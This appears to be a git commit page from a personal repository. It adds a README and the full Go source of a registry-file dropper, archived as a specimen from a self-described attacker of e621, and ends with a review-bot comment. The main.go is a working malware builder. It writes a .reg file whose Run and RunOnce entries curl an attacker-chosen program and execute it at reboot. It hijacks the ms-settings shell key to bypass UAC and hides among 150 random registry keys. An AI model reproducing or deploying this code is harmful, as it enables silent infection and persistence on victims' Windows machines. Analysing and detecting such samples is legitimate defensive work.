authorXe Iaso <me@xeiaso.net>2023-06-19 12:29:26 -0400
committerXe Iaso <me@xeiaso.net>2023-06-19 12:35:08 -0400
commit65686860aedc94393d70c6b0fd1261792c492b20 (patch)
tree209487c2a3a23d5344c80b01e8ffbd1433c0dcfc /cmd/_skidcode/e621_reg_dropper
parent673f8325e2116f5645eeada3727b81f6c37982ab (diff)
downloadx-65686860aedc94393d70c6b0fd1261792c492b20.tar.xz
x-65686860aedc94393d70c6b0fd1261792c492b20.zip
reorg the tree again
Signed-off-by: Xe Iaso <me@xeiaso.net>
Diffstat (limited to 'cmd/_skidcode/e621_reg_dropper')
-rw-r--r--cmd/_skidcode/e621_reg_dropper/README.md21
-rw-r--r--cmd/_skidcode/e621_reg_dropper/main.go144
2 files changed, 165 insertions, 0 deletions
diff --git a/cmd/_skidcode/e621_reg_dropper/README.md b/cmd/_skidcode/e621_reg_dropper/README.md
new file mode 100644
index 0000000..e5722af
--- /dev/null
+++ b/cmd/_skidcode/e621_reg_dropper/README.md
@@ -0,0 +1,21 @@
+# `e621_reg_dropper`
+
+This is a code snippet from the script kiddie that claimed to have
+access to the database for e621. They claimed that this access would
+let them dump a database of all e621 users.
+
+After a month no such database has been released.
+
+The Go program in this folder will create a `.reg` file that
+automatically downloads and runs an arbitrary program that the
+attacker specifies. It additionally tries to cloak itself by inserting
+a bunch of garbage into the registry. The attacker-defined program
+will run when the machine reboots, allowing a gap between infection
+and activation.
+
+Somehow, these generated `.reg` files are not detected by virus
+scanners and a social engineering attack would be required to use this
+as a stage in a longer attack.
+
+This is overwhelmingly bad code though, I wouldn't let this pass in
+code reviews.
diff --git a/cmd/_skidcode/e621_reg_dropper/main.go b/cmd/_skidcode/e621_reg_dropper/main.go
new file mode 100644
index 0000000..c9b8619
--- /dev/null
+++ b/cmd/_skidcode/e621_reg_dropper/main.go
@@ -0,0 +1,144 @@
+package main
+
+import (
+ "fmt"
+ "io/ioutil"
+ "log"
+ "math/rand"
+ "os"
+ "strings"
+ "time"
+)
+
+func main() {
+ commandArgs := os.Args
+ if len(commandArgs) < 3 {
+ log.Fatalf("Usage: %s <direct_link> <output> </spoofed_message> </extra_registry_keys>", commandArgs[0])
+ }
+
+ directDownloadLink := commandArgs[1]
+ outputFilename := commandArgs[2]
+
+ spoofedMessage := ""
+ generateExtraKeys := true
+
+ if len(commandArgs) == 4 {
+ spoofedMessage = commandArgs[3]
+ }
+ if len(commandArgs) == 5 {
+ spoofedMessage = commandArgs[3]
+ generateExtraKeys = (commandArgs[4] == "true")
+ }
+
+ if spoofedMessage != "" {
+ outputFilename += fmt.Sprintf("%%n%%n%s%%n%%0", spoofedMessage)
+ }
+
+ outputFilename += ".reg"
+
+ sections := make([][]string, 0)
+
+ randomIdentifier := GenerateRandomString(8)
+ secondaryRandomIdentifier := GenerateRandomString(8)
+
+ sections = append(sections, []string{"[HKEY_CURRENT_USER\\Software\\Classes\\ms-settings\\shell\\open\\command]", "(Default)=\"C:\\Windows\\System32\\cmd.exe\"", "DelegateExecute=\"\""})
+
+ cmdSequence := []string{
+ "echo @echo off",
+ fmt.Sprintf("curl %s -o %%temp%%\\calc.exe", directDownloadLink),
+ "%temp%\\calc.exe",
+ "exit",
+ }
+
+ cmdOutputStr := "cmd /c \\\"("
+ for i, command := range cmdSequence {
+ if i > 0 {
+ cmdOutputStr += " & "
+ }
+ cmdOutputStr += fmt.Sprintf("echo %s", command)
+ }
+ cmdOutputStr += fmt.Sprintf(")\\\" > %%temp%%\\%s.bat", randomIdentifier)
+
+ registryKeyStr := fmt.Sprintf("\"%s\"=\"%s\"", randomIdentifier, cmdOutputStr)
+ secondaryRegistryKeyStr := fmt.Sprintf("\"%s\"=\"cmd /c echo start /min cmd /c %%temp%%\\%s.bat >> c:\\Users\\public\\%s.bat\"", secondaryRandomIdentifier, randomIdentifier, randomIdentifier)
+
+ sections = append(sections, []string{"[HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]", registryKeyStr, secondaryRegistryKeyStr})
+
+ uacTrigger := fmt.Sprintf("\"%s\"=\"c:\\Users\\public\\%s.bat\"", randomIdentifier, randomIdentifier)
+ sections = append(sections, []string{"[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce]", uacTrigger})
+
+ fakeRegistrySections := make([][]string, 0)
+
+ if generateExtraKeys {
+ fakeRegistrySections = generateFakeRegistrySections(150)
+ }
+
+ sections = append(sections, fakeRegistrySections...)
+
+ // shuffle the sections
+ rand.Seed(time.Now().UnixNano())
+ rand.Shuffle(len(sections), func(i, j int) { sections[i], sections[j] = sections[j], sections[i] })
+
+ allLines := make([]string, 0)
+ for _, section := range sections {
+ allLines = append(allLines, section...)
+ allLines = append(allLines, "")
+ }
+
+ ioutil.WriteFile(outputFilename, []byte("Windows Registry Editor Version 5.00\r\n"+strings.Join(allLines, "\r\n")), 0644)
+}
+
+func GenerateRandomString(length int) string {
+ const charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
+ rand.Seed(time.Now().UnixNano())
+
+ result := make([]byte, length)
+ for index := range result {
+ result[index] = charset[rand.Intn(len(charset))]
+ }
+ return string(result)
+}
+
+func generateFakeRegistrySections(numSections int) [][]string {
+ fakeRegistryKeys := []string{
+ "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\",
+ "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\",
+ "HKEY_CURRENT_USER\\Control Panel\\Desktop\\",
+ "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\",
+ "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\",
+ "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",
+ "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\",
+ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\AppID\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\CLSID\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\TypeLib\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\AppID\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden\\",
+ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden\\SHOWALL\\",
+ }
+
+ fakeRegistrySections := make([][]string, 0)
+
+ for i := 0; i < numSections; i++ {
+ section := []string{}
+ section = append(section, fmt.Sprintf("[%s\\%s]", fakeRegistryKeys[rand.Intn(len(fakeRegistryKeys))], GenerateRandomString(8)))
+ section = append(section, fmt.Sprintf("\"%s\"=\"%s\"", GenerateRandomString(8), GenerateRandomString(9)))
+ fakeRegistrySections = append(fakeRegistrySections, section)
+ }
+
+ return fakeRegistrySections
+}
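Review bot: The new main.go carries no package comment stating that it is an archived specimen rather than a maintained command, so a reader opening the file without the README has no signal about its status; above the `package main` clause at the top of the hunk I would add `// Package main is an archived dropper sample kept for analysis only; see README.md. The _-prefixed parent directory keeps it out of "go build ./...".` For anyone documenting or writing detections for this sample, the only non-random content the program emits is the three fixed sections written in main (the ms-settings shell\open\command key with DelegateExecute, the CurrentVersion\Run key, and the CurrentVersion\RunOnce key); the 150 sections from generateFakeRegistrySections are random filler and carry no signal. The unchecked ioutil.WriteFile return on the last line of main and the deprecated io/ioutil import are the kind of defects the README already alludes to, and I would leave them untouched since the file is a specimen, not code to maintain.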